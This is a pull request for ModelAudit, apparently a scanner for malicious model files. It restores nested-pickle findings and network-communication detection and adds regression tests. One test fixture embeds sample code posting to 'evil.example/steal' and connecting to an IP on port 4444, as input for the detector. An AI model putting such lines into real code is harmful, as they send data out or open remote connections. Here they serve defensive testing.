### PR TITLE
fix: restore nested pickle CI coverage

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -34,6 +34,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Fixed
 
+- **pickle:** restore ModelAudit nested-pickle findings from Rust standalone notices and keep network raw-detector coverage after native pickle findings
 - preserve `S999` unknown-opcode mapping in generic rule fallback
 - **security:** route renamed TFLite FlatBuffers by magic bytes, enforce scanner file-size limits before model reads, and fail closed instead of propagating malformed structure traversal exceptions
 - **onnx:** fail closed on CRITICAL findings, detect `PyFunc` operators and Windows absolute external-data paths, validate external tensor slices with the current ONNX dtype API, and avoid Python-op substring false positives

--- a/modelaudit/scanners/pickle_scanner.py
+++ b/modelaudit/scanners/pickle_scanner.py
@@ -1385,8 +1385,6 @@ class PickleScanner(BaseScanner):
         )
 
     def _should_skip_expensive_raw_detectors(self, result: ScanResult, raw_data: bytes) -> bool:
-        if result.has_errors:
-            return True
         if not self._rust_scan_completed_cleanly(result):
             return False
 
@@ -1607,9 +1605,14 @@ class PickleScanner(BaseScanner):
             self._scan_binary_tail_if_needed(data, result, source)
         if skip_expensive_detectors:
             result.metadata["pickle_expensive_raw_detectors_skipped"] = True
-            result.metadata["pickle_expensive_raw_detector_skip_reason"] = (
-                "prior_critical_findings" if result.has_errors else "rust_complete_clean_no_expensive_raw_seeds"
-            )
+            result.metadata["pickle_expensive_raw_detector_skip_reason"] = "rust_complete_clean_no_expensive_raw_seeds"
+            if self.config.get("check_network_comm", True):
+                result.add_check(
+                    name="Network Communication Detection",
+                    passed=True,
+                    message="No network communication patterns detected",
+                    location=source,
+                )
             return
 
         expensive_limit = self._root_expensive_raw_scan_limit()

--- a/modelaudit/scanners/picklescan_adapter.py
+++ b/modelaudit/scanners/picklescan_adapter.py
@@ -28,12 +28,16 @@ _INCONCLUSIVE_NOTICE_CODES = frozenset(
         "unbounded_stream_truncated",
     }
 )
+_NESTED_PAYLOAD_NOTICE_CODES = frozenset({"nested_payload_detected", "encoded_nested_payload_detected"})
 _DEFAULT_SCAN_OPTIONS = ScanOptions()
 _IMPORT_MODULE_ALIASES = {
     "nt": "os",
     "posix": "os",
 }
-_LEGACY_NOTICE_RULE_CODES = dict.fromkeys(_INCONCLUSIVE_NOTICE_CODES, "S902")
+_LEGACY_NOTICE_RULE_CODES = {
+    **dict.fromkeys(_INCONCLUSIVE_NOTICE_CODES, "S902"),
+    "nested_payload_detected": "S213",
+}
 _LEGACY_SCAN_OUTCOME_REASONS = {
     "encoded_nested_payload_truncated": "encoded_nested_payload_truncated",
     "literal_scan_truncated": "literal_scan_truncated",
@@ -220,14 +224,16 @@ def pickle_report_to_scan_result(
             **notice.to_dict()["details"],
         }
         details.setdefault("pickle_notice_code", notice.code)
+        notice_is_nested_payload = notice.code in _NESTED_PAYLOAD_NOTICE_CODES
         result.add_check(
             name="Standalone Pickle Notice",
-            passed=notice.code not in _INCONCLUSIVE_NOTICE_CODES,
+            passed=notice.code not in _INCONCLUSIVE_NOTICE_CODES and not notice_is_nested_payload,
             message=notice.message,
-            severity=_to_issue_severity(notice.severity),
+            severity=IssueSeverity.CRITICAL if notice_is_nested_payload else _to_issue_severity(notice.severity),
             location=notice.location,
             details=details,
-            rule_code=_legacy_rule_code_for_notice(notice.code),
+            why=_legacy_why_for_notice(notice.code),
+            rule_code=_legacy_rule_code_for_notice(notice.code, details),
         )
         if notice.code == "parse_incomplete" and not suppress_parse_failure_escalation:
             parse_failure_details = {
@@ -476,10 +482,21 @@ def _apply_member_context_to_record(
     record.location = f"{member_location} {record.location}"
 
 
-def _legacy_rule_code_for_notice(notice_code: str | None) -> str | None:
+def _legacy_rule_code_for_notice(notice_code: str | None, details: Mapping[str, Any] | None = None) -> str | None:
     if notice_code is None:
         return None
+    if notice_code == "encoded_nested_payload_detected":
+        encoding = details.get("encoding") if details is not None else None
+        return "S601" if encoding == "base64" else "S602"
     return _LEGACY_NOTICE_RULE_CODES.get(notice_code)
+
+
+def _legacy_why_for_notice(notice_code: str | None) -> str | None:
+    if notice_code == "nested_payload_detected":
+        return "Nested pickle payloads can hide code execution paths from shallow scanners."
+    if notice_code == "encoded_nested_payload_detected":
+        return "Encoded nested pickle payloads can hide deserialization gadgets inside metadata strings."
+    return None
 
 
 def _legacy_scan_outcome_reason(notice_code: str | None) -> str:

--- a/tests/scanners/test_pickle_scanner.py
+++ b/tests/scanners/test_pickle_scanner.py
@@ -163,6 +163,66 @@ def test_expensive_raw_skip_requires_clean_complete_rust_result() -> None:
     assert scanner._should_skip_expensive_raw_detectors(suspicious_result, b"A" * 128) is False
 
 
+def test_data_only_nested_pickle_notice_is_modelaudit_issue(tmp_path: Path) -> None:
+    path = tmp_path / "nested-data.pkl"
+    inner_payload = pickle.dumps({"tiny": "payload"}, protocol=4)
+    path.write_bytes(pickle.dumps({"data": inner_payload}, protocol=4))
+
+    result = PickleScanner().scan(str(path))
+
+    nested_issues = [
+        issue
+        for issue in result.issues
+        if issue.rule_code == "S213" and issue.details.get("pickle_notice_code") == "nested_payload_detected"
+    ]
+    assert nested_issues
+    assert nested_issues[0].severity == IssueSeverity.CRITICAL
+
+
+def test_expensive_raw_prefilter_emits_network_pass_for_clean_pickle(tmp_path: Path) -> None:
+    path = tmp_path / "clean.pkl"
+    path.write_bytes(pickle.dumps({"model_state": {"layer.weight": [1.0, 2.0, 3.0]}}, protocol=4))
+
+    result = PickleScanner().scan(str(path))
+
+    assert result.metadata["pickle_expensive_raw_detectors_skipped"] is True
+    network_passes = [
+        check
+        for check in result.checks
+        if check.name == "Network Communication Detection"
+        and check.message == "No network communication patterns detected"
+    ]
+    assert len(network_passes) == 1
+
+
+def test_native_findings_do_not_suppress_network_raw_detector(tmp_path: Path) -> None:
+    path = tmp_path / "network-code.pkl"
+    path.write_bytes(
+        pickle.dumps(
+            {
+                "code": b"""
+import socket
+import requests
+
+requests.post('http://evil.example/steal')
+socket.connect(('192.168.1.100', 4444))
+""",
+            },
+            protocol=4,
+        )
+    )
+
+    result = PickleScanner().scan(str(path))
+
+    network_issues = [
+        check
+        for check in result.checks
+        if check.name == "Network Communication Detection" and check.status.value == "failed"
+    ]
+    assert network_issues
+    assert not result.metadata.get("pickle_network_raw_detector_skipped")
+
+
 def test_expensive_raw_prefilters_preserve_secret_and_network_findings(tmp_path: Path) -> None:
     path = tmp_path / "seeded.pkl"
     payload = {


### PR DESCRIPTION
## Summary\n- promote Rust standalone nested-pickle notices back to ModelAudit security findings\n- keep network raw-detector coverage after native pickle findings\n- add focused pickle scanner regressions for nested payloads, clean network passes, and secondary network detection\n\n## Tests\n- uv run ruff format modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/\n- uv run ruff check --fix modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/\n- uv run mypy modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/\n- PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest -n auto -m "not slow and not integration" --maxfail=1\n- PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/test_nested_pickle_integration.py::TestNestedPickleIntegration::test_nested_pickle_edge_cases tests/test_network_comm_integration.py::TestNetworkCommIntegration::test_pickle_scanner_integration tests/test_network_comm_integration.py::TestNetworkCommIntegration::test_no_false_positives -q